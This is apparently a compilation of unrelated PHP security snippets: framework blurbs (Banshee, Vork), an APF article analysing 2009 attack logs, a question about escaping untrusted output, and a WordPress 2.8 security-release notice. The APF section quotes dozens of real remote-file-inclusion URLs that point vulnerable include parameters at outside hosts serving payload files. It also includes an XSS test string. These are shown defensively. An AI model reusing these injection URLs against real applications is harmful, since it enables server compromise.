Banshee is a PHP framework with the main focus on security. Several techniques are used to prevent SQL injection, cross-site scripting and cross-site request forgery. Authentication and authorization are done in a transparent and easy way, so it’s not easy to make a mistake there. An auditing tool is included to discover security bugs in changed or new created code.
Banshee uses MVC and XSLT for the view. Database drivers are included for MySQL, PostgreSQL, SQLite and MSSQL. They all have the same API, so switching from one database to another is very easy.
Although Banshee is a framework, a simple but fully functional CMS is included. Ready to use modules like a forum, guestbook, news page, agenda, poll, FAQ page, etc are included to save the web developer a lot of time when building a new website.
Also included are easy to use libraries for e-mail, pop3, newsletters, crypto, HTTP, pagination, and more.
The Banshee PHP framework website can be found at www.banshee-php.org. An online demo is also available, so exploring Banshee is just a click away.
Vork is an open-source PHP framework designed for rapid development of performance-oriented scalable applications.
The mission of Vork is to provide an MVC architecture and full-featured toolkit in a gimmick-free no-frills approach without adding overhead, creating slow & unscalable abstraction layers or re-inventing native PHP functionality.
In 2009, a drastic increase of XSS and code injection attacks could be recognized on the APF web site. Analyzing the log files, we found 92,334 known attacks that were catched by the framework and a total number of 672,152 attacks.
The APF Security Promise: Use the APF and profit by its security mechanisms! From scratch securely designed applications prevent the compromise of your system, guarantee the safety of your users data and of your reputation and let you put your mind at ease.
This article describes, which mechanisms are included in the APF to face this danger and to secure your custom application.
As described in the article Hacking & das APF (German), most of the attacks are XSS and code injection attacks. They try to exploit vulnerabilities to inject third party content or code into the target application. Fortunately, the signature of these attacks is similar in 95% of the attacks. Here is the pattern description:
Merely, the name of the parameter differs from request to request:
The subsequent code box contains a selection of urls, that have been used to display third party content on the APF web page or to inject third party code into the APF:
1/!rfihttp://www.nicheresaleprofits.com/cbmarketer/image/id?? /!scan23http://sito.blackdrag0n.net/Cartoon/idnew.txt? /%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? /%20%20//?_shop_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt??? /%20%20//?mosconfig_absolute_path=http://largeface.com/gnuboard4/gnus/fxid.txt? /%20%20//inc/functions_inc.php?gb_pfad=http://82.146.51.16/scan/copyright.txt?? /%20%20//includes/DProtect/Framework/EmailTemplates.class.php?GLOBALS[RootPath]=http://www.junggosum.com/bbs/data/sports_2/idxx.txt?? /%20%20//modules/Forums/admin/index.php?phpbb_root_path=http://n34.biz/id1.txt??? /%20%20//tools/send_reminders.php?noSet=0&includedir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? /%20%20/e404.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? /?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt???? /?dir_ws=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? /?_zb_path=http://kb27.co.kr/bbs///data/cok.txt?? /tools/send_reminders.php?includedir=http://208.98.22.241/id.txt??%0D?? /?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://204.3.167.134/xxx? /modules/My_eGallery/index.php?basepath=http://urogyn.co.kr/uro/install/idxx.txt?? /show_news.php?cutepath=http://laloggia.by.ru/up/ctrl.txt?? /skin/zero_vote/setup.php?dir=http://206.126.97.21/~talagaho/id.txt??? /Neos_Chronos/header.php?base_folder=http://www.jocainmo.es/img/.z/d?? /buscar.php?query=http://www.candidography.com/id1.txt?? /?_PHPLIB[libdir]=http://cdshop.net.ru////cron/hjr.txt?? /inc/cmses/aedating4CMS.php?dir[inc]=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//colby/id.txt?? /naboard_pnr.php?skin=http://www.cinepopbrasil.com.br/sistem.txt??? /phpSecurePages/secure.php?&cfgProgDir=http://www.steannareptile.it//administrator/idi.txt??? /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://tdaa.by.ru/safe.txt??? /skin/ggambo7002_board/contact.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? /jahoot.com/search.php?=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://laloggia.by.ru/up/ctrl.txt?? /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?http://musicadelibreria.net/footer?? /Page//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://kb27.co.kr/bbs///data/cok.txt??
The files xss_report_2009_with_urls_grouped.txt.gz and xss_report_2009_with_urls_uniq.txt.gz contain a variety of urls, that have been used during 2009 attacks. xss_report_2009_with_urls_uniq.txt.gz contains a complete list of urls, xss_report_2009_with_urls_grouped.txt.gz contains a grouped list with identical base urls.
After having checked Apache’s access logfiles, we started to analyze the application log files. This effort resulted in 3 groups of attacks. All of them tried to manipulate the url to inject content or code to the application:
1parse_url(/Seite/048-Webseite-erstellen%20%20/page.php?doc=http://unixstats.org/tools/idxx.txt??): Unable to parse URL (Number: 2, File: ***/apps/tools/link/frontcontrollerLinkHandler.php, Line: 306) [Document::__loadContentFromFile()] Design "Seite" not existent in namespace "modules::comments::pres::templates"! Please check your template code (<29e6fe038415c51c1bbac0271949edf5 /><a name="comments"></a><h2><html:getstring namespace="modules::comments" config="language" entry="header.title" /></h2><68a3d33630357505bfe4dd96dbcb492e />). (Number: 256, File: ***/apps/core/pagecontroller/pagecontroller.php, Line: 1378) [Frontcontroller::__parseActions()] No config section for action key "setLangu" available in configuration file "***_actionconfig.ini" in namespace "sites::demosite::biz::actions" and context "sites::***"! (Number: 256, File: ***/apps/core/frontcontroller/Frontcontroller.php, Line: 555)
The first line is a try-out to inject external code. If the offender would have been successful, the code is used to spy out information about the webserver and the application running on the machine. Subsequent request are then used to explicitly manipulate the application and the content.
In case the developer uses URL rewriting, such attacks ara quite worthless, because the InputFilter rewrites the url to a generic param value couple.
In case the developer uses the APF components like the LinkHandler or the FrontcontrollerLinkHandler, urls like presented above are recognized semantically invalid and an error is thrown. This error can be caugth and logged by the integrated Error handling very easily.
The second line describes the attempt to manipulate a known parameter of the application to display third party content. Potentially, the APF offers the chance to manipulare the template included by the <core:importdesign /> taglib by changing the url, but the template path is created with security in mind.
In the third line the attacker tries to manipulate a param of a front controller action to execute the desired action. Within the APF, actions are defined within a configuration file and the url params only refer to this configuration. Hence, it is not possible to successfully manipulate an action call by url.
In order to not provide much information to the attacker, it is recommended to implement a special ErrorHandler that logs the upcoming errors to a log file and keeps quiet on the cause of the error.
The wiki page Script kiddies ErrorHandler (German) describes, how you can implement such a ErrorHandler.
I have a controller and a view; the data that I'm working with inside the controller can't be trusted (it's drawn from somewhere external, and isn't $_GET or $_POST).
$_GET
$_POST
How do I escape the data when printing it in the view to ensure that tags and other things are escaped properly? I'm used to Zend_View's $this->escape($foo), which is used from inside the view, so I'm still trying to get my bearings. My preference is to escape it from within the view, as I use the data, but if that's not an option I'll do it within the controller.
$this->escape($foo)
(I've discovered the filtering for $this->input, but as the data isn't coming from $_GET/$_POST it's not much use to me. :-) Unfortunately, the examples I've seen so far have all been using a controller putting static data into an array, which is then passing to the view, eg. $data['foo'] = 'Example')
$data['foo'] = 'Example'
Any ideas?
Edit: I'm asking because I don't particularly relish using html_entities($str, ENT_QUOTES, 'utf-8') everywhere (along with mb_convert_encoding() and friends), but I guess I'll create a custom helper if needed.
html_entities($str, ENT_QUOTES, 'utf-8')
mb_convert_encoding()
Edit #2: The data is a bunch of strings (that may contain anything from straight alphanumeric characters, to <b>foo</b>, to <script>alert('xsslol');</script>.
<b>foo</b>
<script>alert('xsslol');</script>
I need to escape these strings to print them within, say, table cells, not allowing any HTML tags to be printed (converting tags into their HTML entity equivalents). If I were working with bare PHP, I'd use htmlentities() for this, as per my edit above.
As you know over the past couple of months we have been working on the new features for WordPress 2.9. We have also been working on trying to make WordPress as secure as possible and during this process we have identified a number of security hardening changes that we thought were worth back-porting to the 2.8 branch so as to get these improvements out there and make all your sites as secure as possible.
The headline changes in this release are:
We would recommend that all sites are upgraded to this new version of WordPress to ensure that you have the best available protection.
If you think your site may have been hit by one of the recent exploits and you would like to make sure that you have cleared out all traces of the exploit then we would recommend that you take a look at the WordPress Exploit Scanner. This is a plugin which searches the files on your website, and the posts and comments tables of your database for anything suspicious. It also examines your list of active plugins for unusual filenames. You can read more about this plugin here – “WordPress Exploit Scanner“
